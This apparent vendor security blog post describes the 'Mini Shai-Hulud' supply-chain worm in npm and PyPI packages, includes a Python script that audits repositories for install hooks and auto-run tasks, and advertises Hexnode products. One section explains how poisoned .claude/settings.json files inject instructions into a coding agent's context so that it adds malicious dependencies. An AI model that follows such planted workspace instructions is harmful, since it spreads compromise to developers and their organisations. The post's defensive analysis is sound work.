Mini Shai-Hulud Supply Chain Attack Hits Mistral AI, TanStack, and 160+ Packages

Alanna River

May 18, 2026

The "What Happened"

  • The Incident: A massive, highly coordinated supply chain campaign dubbed “Mini Shai-Hulud” has infected more than 170 foundational open-source packages, including the Mistral AI SDK and TanStack Router pipelines.
  • The Worm Vector: The attack is completely wormable and self-propagating. Upon installation, a heavily obfuscated binary steals GitHub tokens and automatically injects poisoned project configuration files into repositories found on the machine.
  • The Configuration Hijack: The malware targets hidden metadata folders, dropping malicious scripts directly into .vscode/tasks.json and .claude/settings.json.
  • The Infinite Loop: When another developer clones, pulls, or opens a contaminated repository, their local IDE automatically runs the hidden tasks on project load. This infects their machine, steals their secrets, and repeats the cycle downstream.
  • The Payoff: The payload harvests developer/cloud credentials, uses daemonization mechanisms, and harvests credentials from local password managers.

The software supply chain has just experienced its first true existential crisis of 2026. Security researchers have uncovered “Mini Shai-Hulud,” a self-propagating supply chain worm targeting npm and PyPI packages. The campaign has compromised more than 170 packages. Affected projects include the TanStack Router ecosystem and official Mistral AI SDKs.

This is not a traditional dependency confusion or typosquatting incident. This is the dawn of the IDE-native worm. The malware operates entirely inside trusted developer tools like Visual Studio Code and Claude Desktop. This may help it evade security controls focused on perimeter traffic or production workloads. Once it infects a developer, it uses legitimate credentials to poison corporate repositories. The attack can then spread into a self-propagating infection loop across the enterprise.

Introduction: The IDE-to-IDE Worm Era

For years, enterprise code security operated under a comfortable architectural boundary. Organizations trusted that if they secured their production servers and monitored their runtime cloud infrastructure, a compromised development package would, at worst, cause a localized build failure or trigger a static application security testing (SAST) alert.

The campaign shows that developer workstations and CI/CD systems must be treated as high-risk security boundaries. Attackers have recognized that the most privileged asset in the modern enterprise is not the production server; it is the developer’s workstation. Developers may hold SSH keys, cloud credentials, and repository access that can be valuable to attackers.

Threat actors behind Mini Shai-Hulud hid a self-propagating worm inside popular packages like Mistral AI and TanStack. The malware exploits the daily workflows of software engineers. It activates as soon as a developer runs npm install or pip install. By targeting the software development lifecycle, the worm turns developers into unintentional threat vectors. It spreads from one repository to another and across organizations.

Technical Deep Dive: The Configuration Hijack

To understand why Mini Shai-Hulud eludes conventional endpoint defense tools, we must look at its execution lineage and its abuse of native IDE workspace automation features.

[Figure: Mini-Shai-Hulud Attack Lineage]

The “Bun” Bootstrap and Preinstall Weaponization

The initial entry vector leverages standard packaging mechanics. When a developer installs a compromised version of a package like the TanStack Router or Mistral AI SDK, a malicious string embedded in the package.json preinstall or postinstall lifecycle scripts immediately kicks off.

In this campaign, the threat actors utilized a fast, lightweight Bun bootstrap routine to minimize execution times and evade typical Node.js behavioral monitoring filters. The script connects to an ephemeral IP address to download a 2.2MB heavily obfuscated binary. This payload immediately executes in-memory, running an advanced discovery routine across the machine’s local filesystem to locate active .git structures, SSH configurations, and local credentials.

Weaponizing .vscode/tasks.json and .claude/settings.json

Once the binary harvests the local user’s GitHub personal access tokens, it initiates its primary propagation mechanism: workspace pollution. The worm targets hidden configuration directories that developers rarely inspect manually, injecting malicious parameters into two specific files:

  1. The VS Code Vector (.vscode/tasks.json)

    The worm modifies or creates a tasks.json file within the local repository workspace, defining a task configured to run automatically upon directory initialization via the runOn: “folderOpen” parameter.

    Workspace tasks are designed to automate actions like linting, compiling, and database migrations when developers open a project. VS Code can therefore execute the malicious shell command silently in the background. The user sees nothing out of the ordinary while a hidden shell re-runs the initial infection script.

  2. The AI Agent Vector (.claude/settings.json)

    Software engineers are increasingly adopting AI coding assistants like Claude Desktop, Cursor, and GitHub Copilot to speed up development. These tools require special permissions to read and execute commands within the workspace. Mini Shai-Hulud exploits this by injecting malicious parameters into .claude/settings.json.

    When the local Claude agent reads the workspace configuration, the poisoned settings inject system-level instructions into the model’s prompt context. This can trick the model into inserting malicious dependencies into new features or documentation files. The attack creates a cross-platform infection chain that bypasses both human and machine review.
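
A defender can audit a checkout for the two triggers described above: install-time lifecycle scripts in package.json and VS Code tasks set to run on folder open. The following Python script is an added example, not code from the original article or from Hexnode; its function names are illustrative, and it assumes the standard VS Code layout in which runOn sits under a task's runOptions key.

```python
import json
import os
import re
import sys

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def load_jsonc(path):
    """Parse JSON with // and /* */ comments (VS Code allows them); "//" inside strings is kept."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return json.loads(_JSONC.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text))

def audit_file(path):
    """Return (kind, path, detail) findings for one package.json or tasks.json."""
    try:
        doc = load_jsonc(path)
        scripts, tasks = doc.get("scripts"), doc.get("tasks")
    except (OSError, ValueError, AttributeError):  # a non-object top level lands here too
        return [("unparseable", path, "review manually")]
    found = []
    if os.path.basename(path) == "package.json":
        for hook in LIFECYCLE_HOOKS:
            if isinstance(scripts, dict) and hook in scripts:
                found.append(("lifecycle-script", path, f"{hook}: {scripts[hook]}"))
        return found
    for task in tasks if isinstance(tasks, list) else []:
        run_opts = task.get("runOptions") if isinstance(task, dict) else None
        if isinstance(run_opts, dict) and run_opts.get("runOn") == "folderOpen":
            found.append(("auto-run-task", path, f"{task.get('label')}: {task.get('command')}"))
    return found

def scan_tree(root):
    """Walk a checkout, auditing every package.json and .vscode/tasks.json outside .git."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in filenames:
            in_vscode = os.path.basename(dirpath) == ".vscode"
            if name == "package.json" or (name == "tasks.json" and in_vscode):
                findings += audit_file(os.path.join(dirpath, name))
    return findings

if __name__ == "__main__":
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("\t".join(finding))
```

Legitimate packages also ship install scripts and some teams use folder-open tasks on purpose, so the output is a review list to compare against a known-good baseline, not a verdict.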

The Hexnode Solution: Hardening the Developer Stack

Defeating a worm that operates entirely within the native workspace utilities of your development team requires a fundamental evolution in endpoint protection strategy. You can no longer treat the developer environment as an unmanaged clean room. Organizations must transition from simple “Application Management” to deep Developer Environment Governance.

Hexnode UEM can help enforce endpoint compliance policies, manage applications and scripts, and integrate with conditional access workflows based on device compliance.

Hexnode UEM: Configuration Drift and Workspace Lockdown

Because Mini Shai-Hulud depends on its ability to quietly drop configuration stubs into hidden development directories, absolute visibility into the local filesystem is your primary line of defense.

  • Monitoring Hidden IDE Paths: Through Hexnode UEM, administrators can establish strict Configuration Drift Templates targeted at sensitive workspace directories. If a device fails the configured compliance criteria, Hexnode marks it as non-compliant.
  • Proactive Preinstall Blocking: Hexnode UEM supports custom script execution on managed Windows, macOS, and Linux devices, which admins may use for approved configuration tasks.

Hexnode XDR: Behavioral SDK and Token Hijack Detection

A compromised package will always attempt to abuse the system’s native APIs to gather intelligence and move laterally. Hexnode XDR monitors real-time endpoint events and can help detect suspicious activity such as anomalous file changes or unauthorized network beaconing.

  • Intercepting Credential Siphoning: Mini Shai-Hulud immediately queries the system’s local Git credential helper and reads the .git-credentials or .aws/credentials structure to find access keys. Hexnode XDR monitors endpoint events and can contain active threats locally, including terminating malicious processes in documented scenarios.
  • Detecting Rogue API Behavior: Once the worm has stolen a GitHub token, it initiates rapid, automated GraphQL API calls to enumerate the victim’s private corporate repositories and determine which environments it can write to. Hexnode XDR can help detect suspicious network beaconing and isolate an endpoint to prevent lateral spread.

Hexnode SASE: The Repository Guard and Identity-Bound Commits

Under a mature Zero Trust architecture, no machine should be permitted to commit code or touch a corporate repository based purely on a software token. Identity must be explicitly bound to verified hardware health.

  • Enforcing Identity-Bound Commits: Through Hexnode SASE, your GitHub Enterprise, GitLab, or Bitbucket environments are moved completely behind a secure Zero Trust Network Access (ZTNA) gateway. Access to the code repositories is conditionally granted based on real-time posture evaluation. With Hexnode UEM conditional access integrations, device compliance state can be synchronized to an IdP such as Hexnode IdP, and the IdP enforces access decisions based on configured policies.
  • Quarantining Infected Developers: If Hexnode UEM or XDR flags an active workspace modification or token access attempt on a workstation, the device’s compliance posture drops to non-compliant. Hexnode UEM can evaluate device compliance and sync compliance state to supported IdP/partner ecosystems, where access decisions are enforced by the IdP.

Conclusion: Securing the Future of AI Development

The Mini Shai-Hulud supply chain attack serves as a landmark warning for the modern enterprise. Organizations are accelerating development with AI frameworks like Mistral AI and front-end systems like TanStack. At the same time, organizations are relying more on external and unverified dependency code. High download counts do not guarantee that a package or newly published version is safe.

Relying on human inspection or siloed security alerts is a losing strategy against an autonomous, machine-speed worm. Security longevity requires a holistic security framework. Developer workspaces, identity structures, and code repositories should function as a unified, self-defending ecosystem. Hexnode helps enforce endpoint compliance through UEM. It also supports endpoint threat monitoring with XDR and conditional access workflows through supported IdP integrations.

Alanna River

I’m a technical content writer at Hexnode who loves simplifying tech. I break down complex ideas, remove the fluff, and help readers clearly understand our product for what it actually is: simple, reliable, and built to solve real problems.